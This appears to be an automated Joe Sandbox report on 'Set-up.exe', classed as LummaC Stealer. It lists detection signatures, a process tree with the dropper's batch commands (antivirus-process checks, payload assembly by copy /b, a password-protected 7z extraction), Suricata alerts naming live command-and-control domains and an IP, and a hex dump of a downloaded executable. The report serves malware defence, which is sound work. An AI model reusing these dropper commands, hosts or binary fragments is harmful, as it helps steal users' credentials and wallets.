Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:Set-up.exe
Analysis ID:1545453
MD5:8ea72d1dd14d5a570d5f5a595cfd1d5d
SHA1:95b3578c21adee532b48059d2e6d464676ac4768
SHA256:642b22477ed760060155d8e6fc892590774ea57844694d22e47d23bb0473f10f
Tags:exeuser-aachum
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Contains functionality to detect sleep reduction / modifications
Contains functionality to register a low level keyboard hook
Drops PE files with a suspicious file extension
Drops password protected ZIP file
Machine Learning detection for dropped file
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes many files with high entropy
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Enables security privileges
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Copy From or To System Directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Set-up.exe (PID: 3880 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: 8EA72D1DD14D5A570D5F5A595CFD1D5D)
    • cmd.exe (PID: 4800 cmdline: "C:\Windows\System32\cmd.exe" /c copy Crest Crest.bat & Crest.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 5660 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 2308 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 3548 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6192 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7112 cmdline: cmd /c md 506033 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 6432 cmdline: findstr /V "RubberBrilliantPoliceOperator" Count MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2924 cmdline: cmd /c copy /b ..\Lil + ..\Labeled + ..\Warren + ..\Current + ..\Endless + ..\Towers + ..\Based W MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Limitations.pif (PID: 1832 cmdline: Limitations.pif W MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • X0JA3EDV7BU5B3IH21ST0OE852AR.exe (PID: 2884 cmdline: "C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exe" MD5: CE901A874C9D157E48F83B1BE3D32AA6)
          • cmd.exe (PID: 5688 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • mode.com (PID: 6816 cmdline: mode 65,10 MD5: BEA7464830980BF7C0490307DB4FC875)
            • 7z.exe (PID: 1176 cmdline: 7z.exe e file.zip -p29586644319935208542739921766 -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
            • 7z.exe (PID: 3460 cmdline: 7z.exe e extracted/file_11.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
            • 7z.exe (PID: 4208 cmdline: 7z.exe e extracted/file_10.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
            • 7z.exe (PID: 6756 cmdline: 7z.exe e extracted/file_9.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
            • 7z.exe (PID: 6880 cmdline: 7z.exe e extracted/file_8.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
            • 7z.exe (PID: 884 cmdline: 7z.exe e extracted/file_7.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
            • 7z.exe (PID: 6776 cmdline: 7z.exe e extracted/file_6.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
            • 7z.exe (PID: 5192 cmdline: 7z.exe e extracted/file_5.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
            • 7z.exe (PID: 880 cmdline: 7z.exe e extracted/file_4.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
            • 7z.exe (PID: 1912 cmdline: 7z.exe e extracted/file_3.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
            • 7z.exe (PID: 6896 cmdline: 7z.exe e extracted/file_2.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
            • 7z.exe (PID: 4232 cmdline: 7z.exe e extracted/file_1.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
            • attrib.exe (PID: 6844 cmdline: attrib +H "Installer.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
            • Installer.exe (PID: 3780 cmdline: "Installer.exe" MD5: 89A069871324D35E25922F6FB881D514)
      • choice.exe (PID: 4600 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    System Summary

    barindex
    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Limitations.pif W, CommandLine: Limitations.pif W, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\506033\Limitations.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\506033\Limitations.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\506033\Limitations.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Crest Crest.bat & Crest.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4800, ParentProcessName: cmd.exe, ProcessCommandLine: Limitations.pif W, ProcessId: 1832, ProcessName: Limitations.pif
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Crest Crest.bat & Crest.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Crest Crest.bat & Crest.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 3880, ParentProcessName: Set-up.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Crest Crest.bat & Crest.bat, ProcessId: 4800, ProcessName: cmd.exe

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: Process startedAuthor: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Crest Crest.bat & Crest.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4800, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 6192, ProcessName: findstr.exe
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-30T15:44:32.514446+010020546531A Network Trojan was detected192.168.2.649985172.67.145.203443TCP
    2024-10-30T15:44:33.660248+010020546531A Network Trojan was detected192.168.2.649986172.67.145.203443TCP
    2024-10-30T15:44:43.750650+010020546531A Network Trojan was detected192.168.2.649994172.67.145.203443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-30T15:44:32.514446+010020498361A Network Trojan was detected192.168.2.649985172.67.145.203443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-30T15:44:33.660248+010020498121A Network Trojan was detected192.168.2.649986172.67.145.203443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-30T15:44:32.022745+010020570861Domain Observed Used for C2 Detected192.168.2.649985172.67.145.203443TCP
    2024-10-30T15:44:33.190335+010020570861Domain Observed Used for C2 Detected192.168.2.649986172.67.145.203443TCP
    2024-10-30T15:44:34.544726+010020570861Domain Observed Used for C2 Detected192.168.2.649987172.67.145.203443TCP
    2024-10-30T15:44:35.708121+010020570861Domain Observed Used for C2 Detected192.168.2.649988172.67.145.203443TCP
    2024-10-30T15:44:37.421979+010020570861Domain Observed Used for C2 Detected192.168.2.649989172.67.145.203443TCP
    2024-10-30T15:44:38.811675+010020570861Domain Observed Used for C2 Detected192.168.2.649990172.67.145.203443TCP
    2024-10-30T15:44:39.885987+010020570861Domain Observed Used for C2 Detected192.168.2.649991172.67.145.203443TCP
    2024-10-30T15:44:41.096945+010020570861Domain Observed Used for C2 Detected192.168.2.649992172.67.145.203443TCP
    2024-10-30T15:44:42.211836+010020570861Domain Observed Used for C2 Detected192.168.2.649993172.67.145.203443TCP
    2024-10-30T15:44:43.297089+010020570861Domain Observed Used for C2 Detected192.168.2.649994172.67.145.203443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-30T15:44:31.379405+010020570851Domain Observed Used for C2 Detected192.168.2.6646021.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-30T15:44:31.363808+010020570891Domain Observed Used for C2 Detected192.168.2.6576321.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-30T15:44:31.349697+010020570931Domain Observed Used for C2 Detected192.168.2.6606401.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-30T15:44:31.098506+010020570951Domain Observed Used for C2 Detected192.168.2.6509011.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-30T15:44:39.273137+010020480941Malware Command and Control Activity Detected192.168.2.649990172.67.145.203443TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exeAvira: detection malicious, Label: TR/Dldr.Agent.vfpsy
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeAvira: detection malicious, Label: TR/Redcap.bgduw
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeReversingLabs: Detection: 79%
    Source: C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exeReversingLabs: Detection: 91%
    Source: C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exeJoe Sandbox ML: detected
    Source: Set-up.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 172.67.145.203:443 -> 192.168.2.6:49985 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.145.203:443 -> 192.168.2.6:49986 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.145.203:443 -> 192.168.2.6:49987 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.145.203:443 -> 192.168.2.6:49988 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.145.203:443 -> 192.168.2.6:49989 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.145.203:443 -> 192.168.2.6:49990 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.145.203:443 -> 192.168.2.6:49991 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.145.203:443 -> 192.168.2.6:49992 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.145.203:443 -> 192.168.2.6:49993 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.145.203:443 -> 192.168.2.6:49994 version: TLS 1.2
    Source: Set-up.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: number of queries: 1001
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeCode function: 16_2_0040367D GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,16_2_0040367D
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeCode function: 16_2_004031DC FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,16_2_004031DC
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_00117978 FindFirstFileW,FindFirstFileW,free,20_2_00117978
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 33_2_00E4A151 FindFirstFileExW,33_2_00E4A151
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0011881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,20_2_0011881C
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\506033\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\506033Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2057085 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (goalyfeastz .site) : 192.168.2.6:64602 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2057089 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (opposezmny .site) : 192.168.2.6:57632 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2057086 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (goalyfeastz .site in TLS SNI) : 192.168.2.6:49985 -> 172.67.145.203:443
    Source: Network trafficSuricata IDS: 2057095 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (servicedny .site) : 192.168.2.6:50901 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2057086 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (goalyfeastz .site in TLS SNI) : 192.168.2.6:49992 -> 172.67.145.203:443
    Source: Network trafficSuricata IDS: 2057086 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (goalyfeastz .site in TLS SNI) : 192.168.2.6:49993 -> 172.67.145.203:443
    Source: Network trafficSuricata IDS: 2057086 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (goalyfeastz .site in TLS SNI) : 192.168.2.6:49991 -> 172.67.145.203:443
    Source: Network trafficSuricata IDS: 2057086 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (goalyfeastz .site in TLS SNI) : 192.168.2.6:49994 -> 172.67.145.203:443
    Source: Network trafficSuricata IDS: 2057086 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (goalyfeastz .site in TLS SNI) : 192.168.2.6:49987 -> 172.67.145.203:443
    Source: Network trafficSuricata IDS: 2057086 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (goalyfeastz .site in TLS SNI) : 192.168.2.6:49990 -> 172.67.145.203:443
    Source: Network trafficSuricata IDS: 2057086 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (goalyfeastz .site in TLS SNI) : 192.168.2.6:49988 -> 172.67.145.203:443
    Source: Network trafficSuricata IDS: 2057086 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (goalyfeastz .site in TLS SNI) : 192.168.2.6:49986 -> 172.67.145.203:443
    Source: Network trafficSuricata IDS: 2057093 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (seallysl .site) : 192.168.2.6:60640 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2057086 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (goalyfeastz .site in TLS SNI) : 192.168.2.6:49989 -> 172.67.145.203:443
    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49986 -> 172.67.145.203:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49986 -> 172.67.145.203:443
    Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49990 -> 172.67.145.203:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49985 -> 172.67.145.203:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49985 -> 172.67.145.203:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49994 -> 172.67.145.203:443
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 33_2_00E41280 std::_Xinvalid_argument,GetTickCount,GetTickCount,Sleep,GetTickCount,GetModuleHandleW,GetSystemInfo,FindResourceW,LoadResource,URLDownloadToFileA,ShellExecuteA,GetProcAddress,LockResource,GetProcAddress,Concurrency::cancel_current_task,33_2_00E41280
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 14:44:44 GMTContent-Type: application/octet-streamContent-Length: 3125704Last-Modified: Tue, 20 Aug 2024 12:02:17 GMTConnection: keep-aliveETag: "66c485c9-2fb1c8"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 58 05 30 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 d4 4e 00 00 00 00 00 00 00 00 00 00 c0 75 2f 00 08 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 8e 01 00 00 10 00 00 00 90 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 3b 00 00 00 a0 01 00 00 3c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 4d 00 00 00 e0 01 00 00 0a 00 00 00 ce 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d4 4e 00 00 00 30 02 00 00 50 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec a1 60 e9 41 00 81 ec 04 09 00 00 53 33 db 3b c3 56 57 74 1f 66 39 1d 62 e9 41 00 74 07 ff d0 a3 60 e9 41 00 50 e8 50 14 00 00 50 e8 ef 84 00 00 59 eb 6e 6a 27 e8 40 14 00 00 8b 75 08 ff 76 0c 8b 3d c0 a2 41 00 ff 36 50 8d 85 fc f6 ff ff 50 ff d7 83 c4 14 39 5e 10 89 5d fc 76 38 8d 5e 14 ff 33 8d 85 fc fe ff ff 68 90 a4 41 00 50 ff d7 83 c4 0c 8d 85 fc fe ff ff 50 8d 85 fc f6 ff ff 50 ff 15 78 a1 41 00 ff 45 fc 8b 45 fc 83 c3 04 3b 46 10 72 cb 8d 85 fc f6 ff ff 50 e8 7e 84 00 00 59 e8 d4 36 00 00 6a 0a ff 15 74 a1 41 00 cc ff 74 24 04 e8 44 ff ff ff cc 56 8b f1 e8 25 73 00 00 c7 06 a0 a4 41 00 c7 46 38 d2 07 00 00 8b c6 5e c3 6a 01 ff 71 04 ff 15 bc a2 41 00 c3 33 c0 39 05 60 ea 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 58 ea 41 00 ff 15 b8 a2 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 1c 00 83 7c 24 08 00 75 07 c7 40 1c 01 00 00 00 33 c0 c2 08 00 a0 70 e9 41 00 f6 d8 1b c0 83 e0 0b 83 c0 08 c3 ff 74 24 10 8b 44 24 08 ff 74 24 10 c7 05 60 e9 41 00 2f 11 40 00 ff 74 24 10 8b 08 50 ff 51 0c 83 25 60 e9 41 00 00 c3 33 c0 c2 0c 00 8b 54 24 08 8b 4c 24 04 0f b7 02 66 89 01 41 41 42 42 66 85 c0 75 f1 c3 8b 4c 24 04 33 c0 66 39
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 14:44:44 GMTContent-Type: application/octet-streamContent-Length: 3125704Last-Modified: Tue, 20 Aug 2024 12:02:17 GMTConnection: keep-aliveETag: "66c485c9-2fb1c8"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 58 05 30 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 d4 4e 00 00 00 00 00 00 00 00 00 00 c0 75 2f 00 08 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 8e 01 00 00 10 00 00 00 90 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 3b 00 00 00 a0 01 00 00 3c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 4d 00 00 00 e0 01 00 00 0a 00 00 00 ce 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d4 4e 00 00 00 30 02 00 00 50 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec a1 60 e9 41 00 81 ec 04 09 00 00 53 33 db 3b c3 56 57 74 1f 66 39 1d 62 e9 41 00 74 07 ff d0 a3 60 e9 41 00 50 e8 50 14 00 00 50 e8 ef 84 00 00 59 eb 6e 6a 27 e8 40 14 00 00 8b 75 08 ff 76 0c 8b 3d c0 a2 41 00 ff 36 50 8d 85 fc f6 ff ff 50 ff d7 83 c4 14 39 5e 10 89 5d fc 76 38 8d 5e 14 ff 33 8d 85 fc fe ff ff 68 90 a4 41 00 50 ff d7 83 c4 0c 8d 85 fc fe ff ff 50 8d 85 fc f6 ff ff 50 ff 15 78 a1 41 00 ff 45 fc 8b 45 fc 83 c3 04 3b 46 10 72 cb 8d 85 fc f6 ff ff 50 e8 7e 84 00 00 59 e8 d4 36 00 00 6a 0a ff 15 74 a1 41 00 cc ff 74 24 04 e8 44 ff ff ff cc 56 8b f1 e8 25 73 00 00 c7 06 a0 a4 41 00 c7 46 38 d2 07 00 00 8b c6 5e c3 6a 01 ff 71 04 ff 15 bc a2 41 00 c3 33 c0 39 05 60 ea 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 58 ea 41 00 ff 15 b8 a2 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 1c 00 83 7c 24 08 00 75 07 c7 40 1c 01 00 00 00 33 c0 c2 08 00 a0 70 e9 41 00 f6 d8 1b c0 83 e0 0b 83 c0 08 c3 ff 74 24 10 8b 44 24 08 ff 74 24 10 c7 05 60 e9 41 00 2f 11 40 00 ff 74 24 10 8b 08 50 ff 51 0c 83 25 60 e9 41 00 00 c3 33 c0 c2 0c 00 8b 54 24 08 8b 4c 24 04 0f b7 02 66 89 01 41 41 42 42 66 85 c0 75 f1 c3 8b 4c 24 04 33 c0 66 39
    Source: Joe Sandbox ViewIP Address: 147.45.47.81 147.45.47.81
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: goalyfeastz.site
